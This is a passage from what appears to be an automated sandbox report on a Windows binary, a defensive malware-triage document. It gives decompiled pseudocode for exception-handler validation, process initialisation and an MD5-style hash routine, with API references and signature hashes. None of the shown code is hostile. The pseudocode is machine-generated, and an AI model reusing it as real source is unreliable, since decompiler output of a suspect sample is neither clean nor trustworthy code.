										 *0x6c504240 = 1;
										__eflags =  *0x6c504240;
										if( *0x6c504240 != 0) {
											goto L60;
										}
										_t84 =  *0x6c5041f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6c504240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6c5041f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6c504200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6c5041fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6c504200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6c504200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6c504240 = 1;
							__eflags =  *0x6c504240;
							if( *0x6c504240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6c504200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6c504200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6c504240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6c504200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6c5041f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6c504200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6c504200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6c50248f
0x6c502492
0x6c502498
0x6c5024b6
0x00000000
0x6c5024b6
0x6c5024a0
0x6c5024a9
0x6c5024af
0x6c5024be
0x6c5024c1
0x6c5024c4
0x6c5024ce
0x6c5024ce
0x6c5024d0
0x6c5024d3
0x6c5024d5
0x6c5024d5
0x6c5024d7
0x6c5024da
0x00000000
0x00000000
0x6c5024dc
0x6c5024de
0x6c502544
0x6c502544
0x6c5026a2
0x00000000
0x6c5026a2
0x6c5024e0
0x6c5024e0
0x6c5024e4
0x6c5024e6
0x6c5024e6
0x6c5024e6
0x6c5024e6
0x6c5024e9
0x6c5024ea
0x6c5024ed
0x6c5024ed
0x6c5024f1
0x6c5024f5
0x6c502503
0x6c502503
0x6c50250b
0x6c502511
0x6c502513
0x6c502515
0x6c502525
0x6c502532
0x6c502536
0x6c50253b
0x6c50253d
0x6c5025bb
0x6c5025bb
0x6c50253f
0x6c50253f
0x6c50253f
0x6c5025bd
0x6c5025bf
0x6c5026a0
0x6c5026a0
0x00000000
0x6c5025c5
0x6c5025c5
0x6c5025cc
0x00000000
0x00000000
0x6c5025d2
0x6c5025d6
0x6c502632
0x6c502634
0x6c50263c
0x6c50263e
0x6c502640
0x00000000
0x00000000
0x6c502642
0x6c502648
0x6c50264a
0x6c50264c
0x6c502661
0x6c502661
0x6c502663
0x6c502692
0x6c502699
0x00000000
0x6c502699
0x6c502667
0x6c502668
0x6c50266a
0x6c50266c
0x6c50266c
0x6c50266e
0x6c502670
0x6c502672
0x6c502686
0x6c502686
0x6c502689
0x6c50268b
0x6c50268b
0x6c50268c
0x6c50268c
0x00000000
0x6c502674
0x6c502674
0x6c502674
0x6c50267d
0x6c50267e
0x6c502680
0x6c502682
0x6c502682
0x00000000
0x6c502674
0x6c502672
0x6c50264e
0x6c502655
0x6c502655
0x6c502657
0x00000000
0x00000000
0x6c502659
0x6c50265a
0x6c50265d
0x6c50265f
0x00000000
0x00000000
0x00000000
0x6c50265f
0x00000000
0x6c502655
0x6c5025d8
0x6c5025db
0x6c5025e0
0x00000000
0x00000000
0x6c5025e9
0x6c5025eb
0x6c5025f1
0x00000000
0x00000000
0x6c5025f7
0x6c5025fd
0x00000000
0x00000000
0x6c502603
0x6c502605
0x6c50260e
0x6c502612
0x00000000
0x00000000
0x6c502618
0x6c50261b
0x6c50261d
0x00000000
0x00000000
0x6c502624
0x6c502626
0x00000000
0x00000000
0x6c502628
0x6c50262c
0x00000000
0x00000000
0x00000000
0x6c50262c
0x00000000
0x00000000
0x00000000
0x6c502517
0x6c502517
0x6c502517
0x6c50251e
0x00000000
0x00000000
0x6c502520
0x6c502521
0x6c502523
0x00000000
0x00000000
0x00000000
0x6c502523
0x6c50254b
0x6c50254d
0x00000000
0x00000000
0x6c50255d
0x6c50255f
0x6c502561
0x00000000
0x00000000
0x6c502567
0x6c50256e
0x6c50259a
0x6c50259a
0x6c50259c
0x6c50259e
0x6c5025b2
0x6c5025b4
0x00000000
0x00000000
0x00000000
0x00000000
0x6c5025a0
0x6c5025a0
0x6c5025a0
0x6c5025a9
0x6c5025aa
0x6c5025ac
0x6c5025ae
0x6c5025ae
0x00000000
0x6c5025a0
0x6c502570
0x6c502573
0x6c502575
0x6c502587
0x6c502587
0x6c50258a
0x6c50258c
0x6c50258c
0x6c50258d
0x6c50258d
0x6c502593
0x00000000
0x00000000
0x00000000
0x00000000
0x6c502577
0x6c502577
0x6c502577
0x6c50257e
0x00000000
0x00000000
0x6c502580
0x6c502580
0x6c502581
0x00000000
0x00000000
0x00000000
0x6c502581
0x6c502583
0x6c502585
0x6c502598
0x00000000
0x00000000
0x00000000
0x6c502598
0x00000000
0x6c502585
0x6c5024f7
0x6c5024fa
0x6c5024fd
0x00000000
0x00000000
0x6c5024ff
0x6c502501
0x00000000
0x00000000
0x00000000
0x6c502501
0x6c5024c6
0x6c5024c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6C502536

Strings

@BPl, xrefs: 6C502637
@BPl, xrefs: 6C502694
@BPl, xrefs: 6C502555

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID: @BPl$@BPl$@BPl
API String ID: 2850889275-2800570366
Opcode ID: fd5a696530c51662183bf13096e41ffab87bfecb4f2d03fa48d231e2b20cad3e
Instruction ID: 7e7825b7b283c40fbd98607125741e308bfeffc716a13b98ec05ae96a8b928cf
Opcode Fuzzy Hash: fd5a696530c51662183bf13096e41ffab87bfecb4f2d03fa48d231e2b20cad3e
Instruction Fuzzy Hash: 7E61F470705602CFDB19CE29DCA875973F5EB96318F398569D816CBE82EB30D882CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6C50146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6C50146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6c5041b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6c5041bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6c5041ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6c5041a8 = _t5;
					 *0x6c5041b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6c5041a4 = _t6;
					if(_t6 == 0) {
						 *0x6c5041a4 =  *0x6c5041a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x6c50146d
0x6c50147b
0x6c501483
0x6c501488
0x6c5014d2
0x6c5014d2
0x6c50148a
0x6c501492
0x6c5014ce
0x6c5014d0
0x6c501494
0x6c501494
0x6c501499
0x6c5014a7
0x6c5014ac
0x6c5014b2
0x6c5014ba
0x6c5014bf
0x6c5014c1
0x6c5014c1
0x6c5014cb
0x6c5014cb

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6C5017B8,73B763F0,00000000), ref: 6C50147B
GetVersion.KERNEL32 ref: 6C50148A
GetCurrentProcessId.KERNEL32 ref: 6C501499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6C5014B2

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 2d4c2a56103da7f954bc1c8e5643a7924cf3457f7dbea2f770b9fd73403abd3b
Instruction ID: 0c0e69c101ef8d2474e2048ffadd4843f739e553771a0be485238d4b4735e373
Opcode Fuzzy Hash: 2d4c2a56103da7f954bc1c8e5643a7924cf3457f7dbea2f770b9fd73403abd3b
Instruction Fuzzy Hash: E9F09A30746710AFFF409F69AC19B423BB4B72AB11F16001EF146CA0C2D3B08040AB8C

Uniqueness

Uniqueness Score: -1.00%

Function 6C548B1A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,8hQl,6C54B7B8,?,?,?,00000001), ref: 6C548B1F
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 6C548B28

Strings

8hQl, xrefs: 6C548B1A

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID: 8hQl
API String ID: 3192549508-3048985772
Opcode ID: 67758587fd8f2e06453831a10d73201833cc5d3484ebbf6b560d71359c1da25c
Instruction ID: 18f33c8217b0b065b46d8380693cd75c65a5a50e218b45ea735d35ef527fdd64
Opcode Fuzzy Hash: 67758587fd8f2e06453831a10d73201833cc5d3484ebbf6b560d71359c1da25c
Instruction Fuzzy Hash: 98B09236044248ABDE102B99D809BB83F78EB0A662F010011F64E448608B76A4908A91

Uniqueness

Uniqueness Score: -1.00%

Function 00506609, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E00506609(void* __ecx, void* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t1 =  &_a4; // 0x50567a
				_t226 =  *_t1;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t682 =  *(_t226 + 4);
				_t407 =  *(_t226 + 8);
				_t348 =  *(_t226 + 0xc);
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x0050660c
0x0050660c
0x00506617
0x0050661a
0x0050661d
0x0050661e
0x0050661e
0x00506629
0x0050663a
0x0050663c
0x0050663f
0x0050663f
0x00506642
0x00506645
0x00506648
0x00506665
0x00506668
0x0050667e
0x00506681
0x0050669b
0x0050669e
0x005066b4
0x005066b7
0x005066b9
0x005066d1
0x005066d4
0x005066d7
0x005066ef
0x005066f2
0x0050670c
0x0050670f
0x00506725
0x00506728
0x0050672a
0x00506742
0x00506747
0x0050674a
0x00506760
0x00506763
0x0050677d
0x00506780
0x00506796
0x00506799
0x0050679b
0x005067b6
0x005067b9
0x005067d0
0x005067d3
0x005067d7
0x005067f0
0x005067f3
0x005067f5
0x005067f8
0x00506813
0x00506816
0x0050682f
0x00506832
0x00506842
0x00506845
0x0050685d
0x00506860
0x0050687a
0x0050687d
0x00506895
0x00506898
0x005068ae
0x005068b1
0x005068c9
0x005068cc
0x005068e4
0x005068e7
0x00506901
0x00506904
0x0050691a
0x0050691d
0x00506935
0x00506938
0x00506952
0x00506955
0x0050696d
0x00506970
0x00506986
0x00506989
0x005069a1
0x005069a4
0x005069bc
0x005069bf
0x005069d1
0x005069d4
0x005069e6
0x005069e9
0x005069fb
0x005069fe
0x00506a02
0x00506a12
0x00506a15
0x00506a23
0x00506a26
0x00506a38
0x00506a3b
0x00506a4f
0x00506a52
0x00506a54
0x00506a64
0x00506a67
0x00506a79
0x00506a7c
0x00506a8a
0x00506a8d
0x00506a9f
0x00506aa2
0x00506aa6
0x00506ab6
0x00506ab9
0x00506acb
0x00506ace
0x00506adc
0x00506adf
0x00506af1
0x00506af4
0x00506b06
0x00506b09
0x00506b1d
0x00506b20
0x00506b34
0x00506b37
0x00506b4b
0x00506b4e
0x00506b62
0x00506b65
0x00506b79
0x00506b7c
0x00506b90
0x00506b95
0x00506ba7
0x00506baa
0x00506bbe
0x00506bc1
0x00506bd5
0x00506bd8
0x00506bee
0x00506bf1
0x00506c05
0x00506c08
0x00506c1a
0x00506c1d
0x00506c31
0x00506c34
0x00506c48
0x00506c4b
0x00506c5f
0x00506c68
0x00506c6b
0x00506c74
0x00506c7d
0x00506c85
0x00506c8d
0x00506c97
0x00506cac

APIs

memset.NTDLL ref: 00506CA0

Strings

zVP, xrefs: 0050660C

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID: zVP
API String ID: 2221118986-565026738
Opcode ID: eab64be8417cd5ac1b5978694f6adc096df73fbdc74eaf4c815df7827f3802de
Instruction ID: 0a65a7e826bc75422487db94638a04360206e3c12b5dad9b3d2227d49157d3e3
Opcode Fuzzy Hash: eab64be8417cd5ac1b5978694f6adc096df73fbdc74eaf4c815df7827f3802de
Instruction Fuzzy Hash: D822847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 005081CD, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005081CD(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
